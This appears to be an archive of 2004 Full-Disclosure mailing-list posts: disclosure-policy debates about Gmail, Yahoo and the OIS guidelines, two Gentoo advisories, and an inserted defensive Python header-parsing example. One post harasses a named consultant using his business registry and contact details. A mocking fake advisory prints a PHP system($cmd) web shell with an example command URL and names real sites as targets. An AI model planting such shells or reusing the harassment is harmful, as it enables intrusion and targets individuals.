Subject: Re: [Full-Disclosure] Gmail/Yahoo!
To: full-disclosure@lists.netsys.com
Yeah, I've contacted the Yahoo! Security Team over the past 1/2 years
with various issues that they -did- follow up and patch, but did not
once think to tell me about progress. It was only after I spoke to a
representative of Yahoo! Security and said I was going to post all the
underground security issues with Yahoo! to FD, that I received an
e-mail to say sorry that we didn't contact you. We've been reading
-all- mails and we've been taking further action(s), after all this
time.
I thought Yahoo! Security had been ignoring me, but the issues were
being patched and that's all that matters at the end of the day.
Although I did think it was bad mannered of Yahoo! representatives to
treat users who provide them with valuable information, to be felt
like 2nd class.
I guess the same may apply for Google Security Team. After all, Yahoo!
and Google were very good partners, up until recently. Google and
Yahoo! seem to have very quickly become rivals, with regards to Search
and E-mail.
The things I could tell FD about Yahoo! would rock the Yahoo! Security
Team to its foundations (and they know it). Luckily for them, I have
morals.
Yahoo! are aware of who I am, even though they know me on another alias.
Cheerio
Maarten wrote:
On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaways seen here.
Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.
> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily have been
> caught short on this issue and a serious hole exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of accounts
> become compromised on the service.
Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?
And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?
Maarten
--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
From: Remko Lodder (remko@elvandar.org)
Date: Mon Jul 05 2004 - 15:53:54 CDT
Hi maarten, and the rest,
Maarten wrote:
> On Monday 05 July 2004 19:42, Eric LeBlanc wrote:
>> On Mon, 5 Jul 2004, System Outage wrote:
>>
>> I agree with "System Outage". Gmail clearly told us that their website is
>> in BETA stage.
>
> Beta, alpha, released, yada yada. Gmail is OPEN for the public, albeit you
> need "an invitation". Thus, enough reason to disclose security holes.
It's being used by others than gmail personnel, so privacy and
information that could be YOURS is at stake here. You just opened up an
e-creditcard and got the numbers and information stolen, whoops, sorry,
since it was vulnerable, now I have the codes as well. I need a car, I
will use your creditcard. Thank you very much mister X, saved me a lot
of money (of course there can be other things in your mailbox as well...)
>
>
>>For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
>>this software MAY HAVE security holes. That's why they want us to test
>>this site before going to the public release, and it's our job to notify
>>to the gmail team all bugs AND security holes we may find. As long as
>>this website is in beta stage, all advisory that someone may send in this
>>list or elsewhere are NOT considered 'Security Advisory' for me.
I do consider them as Security-Advisory. It's being used in the wild,
more and more people are using it, and more and more information is at
risk. Disclosing a bug first to gmail and then to FD is a normal way of
responding to bugs. That way we ALL profit from it.
>>The original author may not receive answers from the Gmail Team, but this
>>site is NOT IN PRODUCTION. When gmail site will be official and when this
>>bug is still there, NOW you can publish your security advisory.
What exactly do you want to tell us? Wait until hundred(s) people more
are vulnerable for privacy disclosure? Somehow I get the feeling you
came from mars with happy campers that don't care about privacy and
disclosing information that could risk your privacy.
>>Furthermore, the best people for testing the software (bugs and security
>>holes) is the public. They can do many things which we will never
>>thought or imagined.
Indeed, that is why gmail is letting people in, and the group is
getting bigger; finding bugs, reporting them to gmail and then disclosing
them is a normal way to follow.
>>BTW, I'm sure that the Gmail developers expect that the public will find
>>some security holes...
>>
>>If we must publish all security advisories about beta software, this list
>>will be flooded...
Beta software is not always used by thousands of people which get larger
every day... Still I like the disclosure so I know that there are bugs
taken out of the system before production. I would get an itch if I
never heard of bugs of the application before. That means that with
current state of coding and defense mechanisms there are a LOT of bugs
still present in the system. Now I would not use that ever in my life..
>
>
> The very reason to HAVE a beta test phase is to find and flush out bugs early.
> Doing that, the released program can be as flawless as can be. So when would
> you suggest disclosing bugs is a good time ? Release date being too late...
Exactly, disclose to gmail now, and then inform the public. Again, and I
repeat that again, it's a normal way of handling.
>
> Maarten
>
Cheers
--
Kind regards,
Remko Lodder |remko@elvandar.org
Reporter DSINet |remko@dsinet.org
Projectleader Mostly-Harmless |remko@mostly-harmless.nl
[Full-Disclosure] [ GLSA 200407-05 ] XFree86, X.org: XDM ignores requestPort setting
From: Thierry Carrez (koon@gentoo.org)
Date: Mon Jul 05 2004 - 15:39:58 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Low
Title: XFree86, X.org: XDM ignores requestPort setting
Date: July 05, 2004
Bugs: #53226
ID: 200407-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
XDM will open TCP sockets for its chooser, even if the
DisplayManager.requestPort setting is set to 0. This may allow
authorized users to access a machine remotely via X, even if the
administrator has configured XDM to refuse such connections.
Background
==========
The X Display Manager (XDM) is a program which provides a graphical
login prompt to users on the console or on remote X terminals. It has
largely been superseded by programs such as GDM and KDM.
Affected packages
=================
    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  x11-base/xfree         <= 4.3.0-r5                    >= 4.3.0-r6
  2  x11-base/xorg-x11      <= 6.7.0                       >= 6.7.0-r1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------
Description
===========
XDM will open TCP sockets for its chooser, even if the
DisplayManager.requestPort setting is set to 0. Remote clients can use
this port to connect to XDM and request a login window, thus allowing
access to the system.
Impact
======
Authorized users may be able to login remotely to a machine running
XDM, even if this option is disabled in XDM's configuration. Please
note that an attacker must have a preexisting account on the machine in
order to exploit this vulnerability.
Workaround
==========
There is no known workaround at this time. All users should upgrade to
the latest available version of X.
Resolution
==========
If you are using XFree86, you should run the following:
# emerge sync
# emerge -pv ">=x11-base/xfree-4.3.0-r6"
# emerge ">=x11-base/xfree-4.3.0-r6"
If you are using X.org's X11 server, you should run the following:
# emerge sync
# emerge -pv ">=x11-base/xorg-x11-6.7.0-r1"
# emerge ">=x11-base/xorg-x11-6.7.0-r1"
References
==========
[ 1 ] CAN 2004-0419
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0419
[ 2 ] XFree86 Bug
http://bugs.xfree86.org/show_bug.cgi?id=1376
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200407-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
[Full-Disclosure] [sb] [ GLSA 200407-03 ] Apache 2: Remote denial of service attack
From: Thierry Carrez (koon@gentoo.org)
Date: Mon Jul 05 2004 - 16:30:45 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Apache 2: Remote denial of service attack
Date: July 04, 2004
Bugs: #55441
ID: 200407-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A bug in Apache may allow a remote attacker to perform a Denial of
Service attack. With certain configurations this could lead to a heap
based buffer overflow.
Background
==========
The Apache HTTP Server Project is an effort to develop and maintain an
open-source HTTP server for modern operating systems. The goal of this
project is to provide a secure, efficient and extensible server that
provides services in tune with the current HTTP standards.
Affected packages
=================
    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-www/apache         <= 2.0.49-r3                   >= 2.0.49-r4
                                                                    < 2
    -------------------------------------------------------------------
Description
===========
A bug in the protocol.c file handling header lines will cause Apache to
allocate memory for header lines starting with TAB or SPACE.
Impact
======
An attacker can exploit this vulnerability to perform a Denial of
Service attack by causing Apache to exhaust all memory. On 64 bit
systems with more than 4GB of virtual memory a possible integer
signedness error could lead to a buffer based overflow causing Apache
to crash and under some circumstances execute arbitrary code as the
user running Apache, usually "apache".
Workaround
==========
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.
Resolution
==========
Apache 2 users should upgrade to the latest version of Apache:
# emerge sync
# emerge -pv ">=net-www/apache-2.0.49-r4"
# emerge ">=net-www/apache-2.0.49-r4"
References
==========
[ 1 ] Georgi Guninski security advisory #70, 2004
http://www.guninski.com/httpd1.html
[ 2 ] CAN-2004-0493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200407-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
--
You have subscribed to the Sicherheitsbote.
http://sicherheitsbote.net
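A bounded header-unfolding routine, added here as an example (it is not Gentoo's or Apache's code), showing the class of defect the advisory describes: continuation lines that begin with TAB or SPACE are appended to the preceding header field, and the size bound has to be checked before each fragment is stored rather than after everything has been read. The limits, the lazy hostile-input generator and the function names are this example's own assumptions, not Apache settings.

```python
"""Bounded unfolding of continuation lines (obs-fold) in HTTP/1.x headers.

Added example, not Gentoo's or Apache's code. It models the bug class in
GLSA 200407-03: a line starting with SPACE or TAB continues the previous
header field, and a server that allocates for every such line before
checking any limit can be driven to exhaust memory. Here the limit is
checked before each fragment is kept, so memory use stays bounded no
matter how many continuation lines a client sends.
"""

from typing import Iterable, Iterator, List, Tuple

MAX_FIELD_SIZE = 8190    # assumed cap per field (name + unfolded value), bytes
MAX_FIELD_COUNT = 100    # assumed cap on the number of header fields


class HeaderLimitExceeded(Exception):
    """A header field or the field count would exceed its configured bound."""


def lines_from_bytes(raw: bytes) -> Iterator[bytes]:
    """Yield CRLF-delimited lines one at a time (stands in for a socket read)."""
    pos = 0
    while pos < len(raw):
        end = raw.find(b"\r\n", pos)
        if end < 0:
            yield raw[pos:]
            return
        yield raw[pos:end]
        pos = end + 2


def parse_headers(lines: Iterable[bytes],
                  max_field_size: int = MAX_FIELD_SIZE,
                  max_field_count: int = MAX_FIELD_COUNT) -> List[Tuple[str, str]]:
    """Parse a request's header block (the lines after the request line, up
    to the empty line). Continuation lines are joined to the previous field
    with a single space. Raises HeaderLimitExceeded as soon as a bound is
    hit and ValueError on a malformed line."""
    fields: List[Tuple[str, str]] = []
    name = ""                 # lower-cased name of the field being built
    parts: List[bytes] = []   # value fragments of the field being built
    size = 0                  # bytes accumulated for the field being built

    def finish_field() -> None:
        if name:
            fields.append((name, b" ".join(parts).decode("latin-1")))

    for line in lines:
        if line == b"":
            break                                   # end of header block
        if line[:1] in (b" ", b"\t"):               # obs-fold continuation
            if not name:
                raise ValueError("continuation line before any header field")
            fragment = line.strip(b" \t")
            size += len(fragment) + 1               # +1 for the joining space
            if size > max_field_size:               # check BEFORE storing
                raise HeaderLimitExceeded(
                    f"field {name!r} exceeds {max_field_size} bytes")
            parts.append(fragment)
            continue
        finish_field()
        if len(fields) >= max_field_count:
            raise HeaderLimitExceeded(f"more than {max_field_count} header fields")
        raw_name, sep, raw_value = line.partition(b":")
        if not sep or not raw_name or raw_name != raw_name.strip(b" \t"):
            raise ValueError(f"malformed header line: {line!r}")
        value = raw_value.strip(b" \t")
        size = len(raw_name) + len(value)
        if size > max_field_size:
            raise HeaderLimitExceeded(
                f"field {raw_name!r} exceeds {max_field_size} bytes")
        name = raw_name.decode("latin-1").lower()
        parts = [value]
    finish_field()
    return fields


def unbounded_fold_request(continuations: int) -> Iterator[bytes]:
    """Constructed hostile input: one field followed by `continuations`
    folded lines, generated lazily so a caller can observe that parsing
    stops long before the whole request has been produced."""
    yield b"X-Long: start"
    for _ in range(continuations):
        yield b"\t" + b"A" * 80
    yield b""


if __name__ == "__main__":
    sample = (b"Host: example.test\r\n"          # constructed request headers
              b"Accept: text/html,\r\n"
              b"\tapplication/xhtml+xml\r\n"
              b"\r\n")
    print(parse_headers(lines_from_bytes(sample)))
    try:
        parse_headers(unbounded_fold_request(10_000_000))
    except HeaderLimitExceeded as exc:
        print("rejected:", exc)
```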
Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: Florian Weimer (fw@deneb.enyo.de)
Date: Mon Jul 05 2004 - 16:36:23 CDT
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.
The definition of the term "security vulnerability" still does not
match current industry practice. Almost all COTS software lacks a
publicly reviewable design document, and popular software has not been
designed for Internet security *at* *all*. In a few cases, this is
even acknowledged by the vendor (think of Microsoft Windows Me or
Microsoft Windows NT).
In fact, I can't think of any recent, critical vulnerability that
matches your definition of a vulnerability.
Re: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
From: Rudolf Polzer (divzero@gmail.com)
Date: Mon Jul 05 2004 - 16:59:52 CDT
On Mon, 5 Jul 2004 21:20:24 +0200 (CEST), frogman@no-log.org
<frogman@no-log.org> wrote:
> the system() function. This is a very VERY 3v1l backdoor, that allows
I didn't expect that you would actually write that, since today is
nowhere near April 1st.
If you now find a DoS in a Brainf*** interpreter by coding an endless
loop in Brainf***, you are the first one on my gmail killfile - until
Mar 31st, 2005. Finding the code for an endless loop in Brainf*** will
be your own problem.
Hoping to read REAL advisories again soon
Rudolf Polzer
Re: [Dailydave] Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: Halvar Flake (HalVar@gmx.de)
Date: Mon Jul 05 2004 - 07:47:21 CDT
Hey all,
> It's rare, but there are still security companies and individuals who do
> not owe their entire business to money from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of independence.
I am not American, but I have to agree to all of the following:
- Nobody trusts the OIS or its motives.
- the purpose of the OIS is to lobby towards a business model for Microsoft
and the other OIS members that involves the removal of non-compliant
security researchers.
- This call for feedback is a thinly disguised attempt to get public
legitimacy and allow the OIS to claim it has community backing, which it
clearly does not.
Cheers,
Halvar Flake
[Full-Disclosure] Do not adopt OIS standards (Was: Public Review of OIS Security Vulnerability Reporting and Response Guidelines)
From: Ferguson, Ann (annfer@duck.wafel.com)
Date: Mon Jul 05 2004 - 17:54:45 CDT
Here is my plea: do not adopt OIS standards, and do not advance OIS
legitimacy by submitting official feedback. This is not a beginning of an
angry rant - please allow me to explain.
I think that OIS guidelines are quite good in suggesting how the
disclosure process should look. I also think there are numerous cases
when it is a smart idea to follow them. And yet, these very guidelines are
based on a very dangerous concept - that all the vendors and researchers
will share the common goal: customer security.
In a free market economy, a typical vendor's goals have very little to do with
the desire to offer a true blend of security and functionality; vendors
focus on trying to look good, and to stay competitive. This alone does not
mean they have no interest in improving security of their products, should
the public become concerned, but that's not my point.
The problem is: responsible disclosure policies, once popular enough to
become a de facto standard that research groups wanting to establish
public credibility are expected to follow, give (some) willing vendors a
powerful tool to marginalize or discredit folks who follow different
disclosure practices - particularly ones that are known to cause worse PR
fallout than others.
And now, whereas most of responsible disclosure policies try to claim they
propose a model that offers substantially higher protection of the
end-user against newly disclosed threats (which then is a good foundation
for vendors to rationalize why they should be always notified in generous
advance), these claims are not universally true. Various disclosure models
have been debated for long years, and none has been conclusively shown to
be superior to others; there are good arguments to back any of them, and
in many situations, specifics of an individual case (level of exposure,
anecdotal or first-hand experience with the vendor, etc) should be
considered by the researcher.
One thing we almost all agree on is that without full disclosure and all
the associated PR activity that forces vendors to react, the cyber world
would, after all those years, be a potentially more dangerous place.
Now if you give vendors a tool to effectively (albeit passively) defend
themselves against folks who do not play nice with them, we make it easier
for them to stick with the old and tried reactive security ("fix where it
breaks") model that cost them nothing. In reality, it is the researcher
who should enjoy protection, vendors are not entitled to any. The
researcher should be protected against frivolous lawsuits, threats,
groundless detention, and other wonders that only hurt disclosure. We
need to ENCOURAGE FULL DISCLOSURE, no matter when and how, no matter what
procedures are to be followed or violated. Disclosure is not perfect, but
as far as I can tell, it is (in the long run) far more beneficial to the
Internet as a whole, by keeping vendors accountable, forcing them to
invest in security, and by making their progress verifiable.
And yet, disclosure has suffered greatly in recent years, with the advent
of informal policies and ridiculous laws that discouraged providing
detailed information about flaws - only succeeding in providing a
competitive advantage to commercial security IDSes, IPSes, security
scanners or assessment software over community-based or homebrew products
(by virtue of the former group having more money and manpower, and
access to "trusted" channels), and not affecting perhaps only black hats,
who usually have enough time on their hands to spend several days digging
through a vague report and analyzing code or reverse-engineering
applications.
There is no need to further advance this - we are not getting any more
secure, and there aren't fewer attacks. If we disclose, let's disclose in
a non-discriminatory manner. Even if we agree with basic OIS policy
premises and see this is a sanely constructed policy, the effects of its
widespread adaptation may be quite far-fetched.
Another problem...
OIS is heavily vendor-controlled. This is not a conspiracy theory, just a
matter of facts. Microsoft and "unbreakable" Oracle are two giant market
forces with vital interests in how security disclosure is being handled,
whereas other companies - Foundstone, @Stake, Bindview, Guardent - once
reputable names in security research, are nowadays struggling in the
current economy to maintain their market niches. These niches could be
easily "embraced" by Microsoft, and so they are largely at their mercy, as
far as I can tell. Who else? Companies such as ISS or SCO are also likely
to be prone to manipulation, and their ethics are not particularly
well-regarded in the community, rightly or not.
Having a vendor-backed and vendor-controlled policy on how researchers
should "responsibly" report security flaws is a very dangerous game: as I
said, we give them tools to get rid of the type of disclosure that is most
embarrassing and most difficult to handle on PR level, and we get NOTHING
in return. Reactive security and fixing overflows one at a time
(nevertheless taking a month or two to resolve it) is dirt cheap. Although
OIS policies might be now considered a set of informational suggestions,
they work hard to establish them more firmly; the language used in those
documents (with all the "requirements" and such) leaves little doubt this
is meant to be a policy that is expected to be enforced (even if only by a
community policy).
In this particular case, since OIS is not representative of any major,
independent security research forces, and has close "evil vendor" ties
instead, it appears to be risky to give any legitimacy to procedures and
policies that may be used to, in turn, give legitimacy to the organization
itself.
Keep in mind that, even if you disagree with my objections to their
policies themselves, as soon as OIS becomes a widely accepted and recognized
icon, these documents may gradually evolve in a manner that is even less
beneficial to the general public. Since the process of "public review and
discussion" is nowhere near being transparent, and the policy-making body
is closed, the situation is simply quite unhealthy.
Again, I am *NOT* advocating any disclosure scheme or timeline, I simply
oppose further advancing imbalance of power.
I ask you not to support OIS, even if you believe the policy is sane and
you hold no grudge against any of the members. If you feel like making the
cyber-world a better place, donate to EFF instead.
Ann
[Full-Disclosure] Re: Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: Randy Bush (randy@psg.com)
Date: Mon Jul 05 2004 - 16:29:31 CDT
you mean the organization for information suppression, leaders
in security through obscurity? great plan, eh?
randy
[Full-Disclosure] Re: Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: Pete Herzog (pete@isecom.org)
Date: Mon Jul 05 2004 - 14:30:34 CDT
All,
The number of researchers locked out of this opinion piece are not alone
in questioning the motives of the OIS. I can only speak for myself but
this process of vulnerability reporting that the OIS suggests is elitist
and unethical. Much more unethical than the releasing of information
publicly to all even if no fix is available.
That there are significant problems with the OIS guidelines is an
understatement. While I agree that there is a need for proposing
guidelines, the actual premise of these particular guidelines
essentially proposes less security. And while the OIS claims it will
not be made into law (http://www.oisafety.org/about.html#6) there is
serious doubt on this premise
(http://www.sbq.com/sbq/vuln_disclosure/sbq_disclosure_liability.pdf) as
existing laws may already be applicable and sure to cause a chilling
effect on security research if these guidelines turn up the heat. Then
the "30 days to disclosure" has no consequence if the research can't be
made in the first place. It would seem that puts the vendor under less
pressure and not more
(http://att.com.com/Panel+defends+flaw+disclosure+guidelines/2100-1002_3-5057914.html).
Another problem is that OIS refused to give independent security
researchers a voice (http://www.oisafety.org/about.html#3) which is the
exact opposite of the claim that the process will actually meet the
needs of the security community (http://www.oisafety.org/about.html#4).
There can be no positive, security reason for this. Are we to assume
that, as according to your guidelines, you will take feedback from all
who are not independent security researchers? How is that label even
defined? How is one a "dependent security researcher" if not dependent
to the vendor?
As if locking out non-vendor-related researchers is not enough, it
becomes even more suspect. Section 2.3 Timeline proposes that the
system be elitist with no mention of how these first-choice groups are
who get the information or how abuse will be handled by those who break
the OIS code of ethics for sharing it with customers, selling it or
auctioning this early warning information. If exploit code is not
allowed and OIS has "no illusions"
(http://www.oisafety.org/about.html#12) that others may already have it,
then why the elitism on who gets to know about it first? This brings me
to the key issue.
The largest problem is that these guidelines don't scale much past the
present where vulnerabilities at worst cause a loss of money. Therefore,
I can't imagine a future where it works when human lives are directly
affected. Vulnerability disclosure aside, it's always better to have
the choice to hear warnings and make rational choices on those warnings
because only the choice maker knows the true value of those choices.
OIS is proposing otherwise (http://www.oisafety.org/about.html#10 and
the "...no illusions...." in
http://www.oisafety.org/about.html#12). Withholding information in an
elitist manner and not giving the public the choice to make their own
security decisions is wrong and unethical.
The OIS committee and guidelines as they stand are absolutely the wrong
foot forward to this future. Not only security researchers should be
angry with this proposal.
Sincerely,
-pete.
Pete Herzog
Managing Director, ISECOM
www.isecom.org
dave wrote:
> Nobody trusts the OIS or its motives. I imagine this is similar to the
> feedback you've gotten from everyone else as well, but Immunity has no
> plans to subscribe to your guidelines, and is going to oppose any
> efforts you make to legislate those guidelines as law. In section 1.1
> the draft proposes that the purpose of the OIS's model is to protect
> systems from vulnerabilities. This is fairly obviously untrue - the
> purpose of the OIS is to lobby towards a business model for Microsoft
> and the other OIS members that involves the removal of non-compliant
> security researchers.
>
> This call for feedback is a thinly disguised attempt to get public
> legitimacy and allow the OIS to claim it has community backing, which it
> clearly does not.
>
> It's rare, but there are still security companies and individuals who do
> not owe their entire business to money from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of independence.
>
> Dave Aitel
> Immunity, Inc.
>
> OIS wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> The Organization for Internet Safety (OIS) extends an invitation to
>>
[Full-Disclosure] On full-disclosure and wiretapping
From: hggdh (hggdh@comcast.net)
Date: Mon Jul 05 2004 - 19:05:53 CDT
Hello,
The Register has, today, this nice article (by extension, from
SecurityFocus, so blast away):
http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/
So... isn't it full-disclosure when anyone can read any e-mail
legally?
--
..hggdh..
[Full-Disclosure] Re: System Outage wrote:
From: Boggles (boggles@hush.com)
Date: Mon Jul 05 2004 - 09:33:58 CDT
Good morning FD fans,
Boggles has Hangover this morning, Too much Boggle juice ingestion.
(Boggles talented like that, Boggles flexible friend!).
Boggles think he have to ask Schools to have 50 week holidays as System
Outage has added pure comedy to the last few days.
Boggles would like to apologise to world for not Oreilly-ing advisories
earlier.
Boggles has managed to focus half a retina to decode Boggles' Inbox.
Boggles appreciate the fan mail. But if Boggles Fans not careful Boggles
have to sell Full-Disclosure email's to iDefense to pay for more mailbox.
(With the exception of System Outage email, even iDefense would think
uber Boggles was taking the Spitzner)
P.S Boggle's luv u all (mostly).
So, without further a do or don't:
Boggle's Delayed Reaction Advisorys are proud to present:
A Boggles Special:
*********************************************
!SPECIAL BOGGLES SPECIAL BOGGLES SPECIAL!
*********************************************
<so1o> got my first book copy from oreilly today
++ Boggles knew he should have done something about that.
++ Boggles is sorry for failing the community and letting so1o
++ publish Network SA.
++ Boggles Hopes he can make up for this by asking the English
++ Government
++ why so1o's company was in liquidation, hadn't filled in a tax
++ return, but was still trading. (companieshouse.gov.uk)
<so1o> i hate report writing
++ Boggles think he mention this already.
++ Boggles doesn't like so1o
++ (Boggles jealous, Boggles want Beastiality Book cover.)
++ So Boggles is going to include more so1o information.
Name: Chris McNab
Company: Matta Consulting Limited
Email: chris.mcnab
trustmatta.com
Company website: trustmatta.com
Domain registrant: (Boggles good with `whois`!!)
Matta Security
18 Duncan Terrace
London London
N1 8BZ
UK
nickbaskett
hotmail.com
++ Boggles visit London.
(I didn't meet the queen tho,
On that topic, who seen Spitzner lately?)
Name & Registered Office :
MATTA CONSULTING LIMITED
314 5102
ST JAMES BARTON
BRISTOL
AVON BS1 3LY
Status :Active(ly wh0ring). [Boggles didn't at that, honest.]
Company No. :03629907
Date of Incorporation : 11/09/1998
Country of Origin : United Kingdom
Company Type: Private Limited Company
Nature Of Business (SIC(92)):
7487 - other business activities [wh0ring]
Accounting Reference Date : 30/09
Last Accounts Made Up To : 30/09/2002 (TOTAL EXEMPTION FULL)
Next Accounts Due : 30/07/2004 [ohh, Boggles enjoy 'dem!]
Last Return Made Up To : 11/09/2003
Next Return Due : 09/10/2004
Last Members List : 11/09/2003 [#phrack]
Previous Names [Christina]
Date of Change : Previous Name :
25/04/2003 NETWORK SECURITY SOLUTIONS LTD.
Branch Details
There are no branches associated with this company.
[If statements would be too ub3r]
Oversea Company Information
There are no Oversea Details associated with this company.
[Oh, dat's a fib]
Boggles suggest groups.google.com for nickbaskett
hotmail.com (it
funny).
using his signature:
"many thanks, Nick Baskett" is funnier. play "follow the work trail"
Boggles enjoy that game.
Chris says he works with the British "High Tech Crime Unit"
(yes the ones who took months to bring the site live because they
were.."concerned about security")
Boggles spoke to LOTS of people.
Boggles think's Chris tell weeny fibblet
Chris should pay ALL money that he has made
(potentially illegally if he hasn't done his paperwork)
to the Amazon rainforest. He has wasted so many _FUCKING_
trees copying and pasting from the internet.
Boggles is sorry to the kids for using nasty word like "amazon".
Fw: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
From: Frog Man (leseulfrog@hotmail.com)
Date: Mon Jul 05 2004 - 16:59:08 CDT
This advisory was not written by me. It's a fake.
bye
frog-m@n
>----- Original Message -----
>From: <frogman@no-log.org>
>To: <full-disclosure@lists.netsys.com>
>Sent: Monday, July 05, 2004 9:20 PM
>Subject: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3
>BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
>
>
> > This is IHCTEAM material. We fuck blackhats and we own the planet. This
>is
> > a leet advisory, s0 l33t. Just read it and be quiet.
> >
> > ---------------------------
> >
> > IHC TEAM private work, all the fame become to IHC TEAM and the leetest
>mr.
> > Frog-m@n !!!!
> >
> > Product: PHP
> > Version: all
> > Security level: Very high baby !!!
> >
> >
> > What's the problem ?
> > ==================
> >
> > There is a BIG 1337 BUG 0day in all the php versions for ever never.
>This
> > bug is caused by
> > the system() function. This is a very VERY 3v1l backdoor, that allows
> > execution of
> > arbitrary shell command. This backdoor has been coded by ZyXyS from
>HACK3R
> > c0rp0r4ti0n (c) (TM) (R).
> >
> > Because we want fame, we'll explain you da bug:
> > l00k at th1s 3v1l code:
> >
> > <?
> > system("$cmd");
> > ?>
> >
> > *TADAAAA* !
> >
> >
> > If this code is on a webserver, a malicious user (like ZyXyS) can exec
> > EVERYTHING and own EVERYWHERE.
> > Example:
> > www.thc-is-lame.org/page.php?cmd=ls%20/tmp
> >
> > It will give you:
> >
> > tmp-shells-owned-with-THC-Hydra-fucking-lame-kiddy-tool.txt
> > adore.tar.gz
> > last-10-leaked-exploits.tar.gz
> >
> >
> > You see, you can rock.
> > So, at this point we can see that ZyXyS is a very leet guy: THIS
>BACKDOOR
> > is less detectable than
> > a LKM BACKDOOR like adore.tar.gz (<--- hahaha).
> >
> > I release this vulnerability because the K-otik team (www.k-otik.com)
> > owned ZyXyS 10 days ago
> > (after the fbi) and discovered the backdoor, and k-otik wanted to write
>an
> > advisory, ONLY FOR FAME
> > AND MONEY. I want this fame (but for the money, I don't mind, I am rich
> > because I sell 0day,
> > traded on #darknet, to idefense), so I had to release the bug before
>K-otik.
> > k-otik is like hack.co.za, they release everything and nothing, but they
> > can't code their own exploit.
> >
> >
> > Greets:
> > ======
> >
> > Rudolf Polzer (divzero@gmail.com): Thank to his idea to disclose this
>bug
> > and if you have another idea
> > for us mail me
> > packetstormsecurity: they give us kiddie-friendly exploits and mass
>rooters
> > spender: he sells good security patches
> > isec: now my grandmother can r00t linux boxes
> > bugtraq: they leak bugs found by ugly blackhats, which worked a lot of
> > time to discover them
> > espionet guys: they represented very well the hacker scene in a TV show
> > with their netbus
> > (please don't open my cdrom device guys)
> >
> >
> > Fame:
> > ====
> >
> >
> > We already owned everyone and everything with these exploits years ago,
> > and in
> > fact we've all had them sitting on the shelf gathering dust due to lack
>of
> > new targets.
> >
> > FUN TESTED IDEAS:
> >
> > www.team-teso.net (down because of us)
> > www.thc.org (haha owned 10 times)
> > www.securityfocus.com
> >
> >
